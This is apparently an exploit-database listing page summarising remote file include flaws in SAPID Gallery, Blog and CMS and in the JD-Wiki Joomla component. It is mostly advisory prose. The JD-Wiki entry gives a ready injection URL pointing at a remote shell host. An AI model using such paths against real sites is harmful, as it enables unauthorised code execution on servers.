header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability

A remote file include vulnerability exists in SAPID Gallery version 1. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal sequences and a malicious file path. This can be exploited to execute arbitrary PHP code on the vulnerable system.

SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability

SAPID Blog version Beta 2 is vulnerable to a remote file include vulnerability. This vulnerability is due to the 'root_path' parameter in multiple scripts not being properly sanitized before being used in an include() function call. This can be exploited to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process.

SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability

SAPID CMS version 1.2.3.05 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the root_path parameter of the get_infochannel.inc.php and get_tree.inc.php scripts. This will allow the attacker to execute arbitrary code on the vulnerable system.

JD-Wiki Remote File Include

JD-Wiki is the Joomla! integration of the nice DokuWiki. DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind. This bug allows a remote attacker to execute commands via RFI. The path for the exploit is ?mosConfig_absolute_path= and the exploit is /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell

Recent Exploits: